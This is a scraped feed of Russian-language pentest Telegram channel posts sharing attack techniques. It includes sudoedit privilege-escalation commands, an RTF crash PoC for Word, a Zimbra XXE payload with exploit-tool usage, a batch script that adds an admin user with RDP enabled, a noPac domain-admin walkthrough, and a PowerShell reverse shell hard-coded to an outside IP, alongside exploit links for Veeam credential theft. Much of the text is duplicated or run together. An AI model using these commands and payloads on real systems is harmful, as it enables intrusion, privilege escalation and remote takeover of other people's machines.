Forwarded from Monkey Hacker
Sudoedit Privilege Escalation (CVE-2023-22809)
#RU
Проверьте, что вы можете использовать sudoedit
Введя дополнительный дэш, мы можем заставить наш редактор работать от имени root
Теперь вы можете читать/писать файлы с привилегиями root
#EN
Check that you can use sudoedit
By introducing an extra dash, we can make our editor work as root
Now you can read/write files with root
Tools:
#RU
Проверьте, что вы можете использовать sudoedit
cat /etc/sudoersВведя дополнительный дэш, мы можем заставить наш редактор работать от имени root
export EDITOR='vim -- /path/to/your/files'Теперь вы можете читать/писать файлы с привилегиями root
sudoedit /etc/custom/service.conf#EN
Check that you can use sudoedit
cat /etc/sudoersBy introducing an extra dash, we can make our editor work as root
export EDITOR='vim -- /path/to/your/files'Now you can read/write files with root
sudoedit /etc/custom/service.confTools:
https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privescForwarded from Эффект пентестера
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
🔥5
XXE to RCE Zimbra CVE-2019-9670
Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)
Payload XXE:
Metasploit:
Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.
Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)
Payload XXE:
xxe [Ниже приведу парочку примеров, как эксплуатировать эту вулну.
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rceArambiz - эксплойт на Python3:
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit
clone https://github.com/oppsec/arbimz.gitZaber - эксплойт на Go:
pip3 install -r requirements.txt
python3 main.py --url https://example.com/
install github.com/oppsec/zaber@latestЕсли у вас не находит бинарь, то пропишите абсолютный путь.
zaber -u https://example.com
-u https://example.comА после работ не забудьте добавить
$HOME/go/bin/ в свой PATH 😉Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.
Буду рад, если распространите этот материал!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7
Forwarded from Monkey Hacker
Сreate user via bat file extension
#RU
На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.
#EN
I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.
#RU
На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.
#EN
I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.
net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
Monkey Hacker
Сreate user via bat file extension #RU На данный момент изучаю Windows и его приколы. Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP. #EN I am currently learning Windows and its tricks. Here is a noscript to create…
Подписывайте на этого крутого парня, который днём и ночью, 25/8 изучает Bitrix ради интереса
CVE-2023-23415 ICMP RCE
Злоумышленник может удаленно использовать эту уязвимость с помощью ошибки протокола низкого уровня, содержащей фрагментированный IP-пакет в заголовке, который отправляется на целевую машину", - говорится в сообщении Microsoft.
Уязвимость затрагивает следующие продукты Microsoft:
Windows Server 2008@(-∞, Mar 14, 2023)
Windows Server 2012@(-∞, Mar 14, 2023)
Windows Server 2016@(-∞, Mar 14, 2023)
Windows 10@(-∞, Mar 14, 2023)
Windows 11@(-∞, Mar 14, 2023)
Windows Server 2022@(-∞, Mar 14, 2023)
Windows Server 2019@(-∞, Mar 14, 2023)
POC'a пока нет(
#CVE
Злоумышленник может удаленно использовать эту уязвимость с помощью ошибки протокола низкого уровня, содержащей фрагментированный IP-пакет в заголовке, который отправляется на целевую машину", - говорится в сообщении Microsoft.
Уязвимость затрагивает следующие продукты Microsoft:
Windows Server 2008@(-∞, Mar 14, 2023)
Windows Server 2012@(-∞, Mar 14, 2023)
Windows Server 2016@(-∞, Mar 14, 2023)
Windows 10@(-∞, Mar 14, 2023)
Windows 11@(-∞, Mar 14, 2023)
Windows Server 2022@(-∞, Mar 14, 2023)
Windows Server 2019@(-∞, Mar 14, 2023)
POC'a пока нет(
#CVE
Forwarded from Monkey Hacker
Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)
Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?
1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:
Чтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте
2.
Объединяя эти вулны, мы имеем примерно такой сценарий
Пользователь запрашивает
Сценарий эксплуатации выглядит так:
1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается
4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения
Звучит душно, благо есть noPac, который эксплуатирует данную проблему
THX:
Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?
1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:
Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuotaЧтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте
sAMAccountName на конце $. Однако прикол в том, что этот символ не всегда проверяется. Атрибутом имени учетной записи компьютера является sAMAccountName. Этот атрибут можно увидеть и отредактировать вручную с помощью ADSIEdit Tool2.
При запросе билета на обслуживание сначала необходимо предъявить TGT. Если запрашиваемый билет не найден KDC, KDC автоматически выполняет повторный поиск с последующим $. Если TGT получен для username, а пользователь username удален, то используя этот TGT для запроса сервисного билета для другого пользователя через S4U2self приведет к тому, что KDC будет искать username$ в AD. Объединяя эти вулны, мы имеем примерно такой сценарий
Пользователь запрашивает
TGT. Затем пользователь может попытаться удалить или переименовать исходную учетную запись компьютера. Получив TGT, пользователь может начать эксплуатировать sAMAccountName. А полностью зная, что KDC поставляет тикеты и временные сеансовые ключи пользователям и компьютерам в домене, мы это можем использовать для повышения привилегийСценарий эксплуатации выглядит так:
1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается
Kerberos TGT с использованием обновленного имени учетной записи компьютера.4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения
S4U2selfЗвучит душно, благо есть noPac, который эксплуатирует данную проблему
THX:
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.htmlhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.tomlhttps://github.com/WazeHell/sam-the-adminGitHub
GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user - GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domai...
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
Adobe Acrobat Reader CVE-2023-21608 RCE: разбор уязвимости
В этой статье мы рассмотрим, как использовалась уязвимость
#CVE #RCE #моястатья
В этой статье мы рассмотрим, как использовалась уязвимость
use-after-free в Adobe Acrobat Reader DC. Ошибка была обнаружена в ходе проекта по фаззингу, направленной на популярные программы для чтения PDF. В итоге была успешно использована уязвимость для удаленного выполнения кода в Adobe Acrobat Reader.#CVE #RCE #моястатья
🌚4🔥2
Похек
Adobe Acrobat Reader CVE-2023-21608 RCE: разбор уязвимости В этой статье мы рассмотрим, как использовалась уязвимость use-after-free в Adobe Acrobat Reader DC. Ошибка была обнаружена в ходе проекта по фаззингу, направленной на популярные программы для чтения…
Большое спасибо за столь активное распространение поста!
Люблю всех вас 🛡️
Люблю всех вас 🛡️
🐳4
Forwarded from Proxy Bar
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!
usage:
Тупо бэкдор!
usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"🔥1
Foxit PDF Reader CVE-2022-28672 RCE: разбор уязвимости
В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость
#CVE #RCE #моястатья
В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость
use-after-free и несколько других багов в Foxit PDF Reader во время фаззинга. Мы смогли успешно использовать эту уязвимость для удаленного выполнения кода в Foxit PDF Reader.#CVE #RCE #моястатья
❤4
Exegol
Exegol - это хакерская среда, управляемая сообществом, мощная и в то же время достаточно простая, чтобы каждый мог использовать ее в повседневной работе. Exegol - это лучшее решение для развертывания мощных хакерских сред безопасно, легко и профессионально. Exegol подходит пентестерам, CTF-игрокам, bug bounty ресерчерам, начинающим и опытным пользователям, защитникам, от стильных пользователей macOS и корпоративных профессионалов Windows до опытных пользователей UNIX.
Установка:
Exegol - это хакерская среда, управляемая сообществом, мощная и в то же время достаточно простая, чтобы каждый мог использовать ее в повседневной работе. Exegol - это лучшее решение для развертывания мощных хакерских сред безопасно, легко и профессионально. Exegol подходит пентестерам, CTF-игрокам, bug bounty ресерчерам, начинающим и опытным пользователям, защитникам, от стильных пользователей macOS и корпоративных профессионалов Windows до опытных пользователей UNIX.
Установка:
git clone https://github.com/ThePorgs/Exegol.git
#tools🐳3
Forwarded from APT
Veeam Backup and Replication (CVE-2023-27532)
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532
Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532
#veeam #credentials #rce #cve
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532
Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532
#veeam #credentials #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡11🎉3
Команда CTF- RedHazzarTeam приглашает в свой состав начинающих специалистов или имеющих опыт в решении задач по криптографии , пывну и реверсу! Молодая амбициозная команда, в настоящий момент взодим в топ10 рейтинга ctftime по РФ. Приветствуются активное участие в жизни Команда CTF- RedHazzarTeam приглашает в свой состав начинающих специалистов или имеющих опыт в решении задач по криптографии , пывну и реверсу! Молодая амбициозная команда, в настоящий момент входим в топ10 рейтинга ctftime по РФ. Приветствуются активное участие в жизни команды, бешеное желание изучать разные аспекты ИБ. Если вас заинтересовало предложение, пишите в лс (@Hazzarim139)
🤝3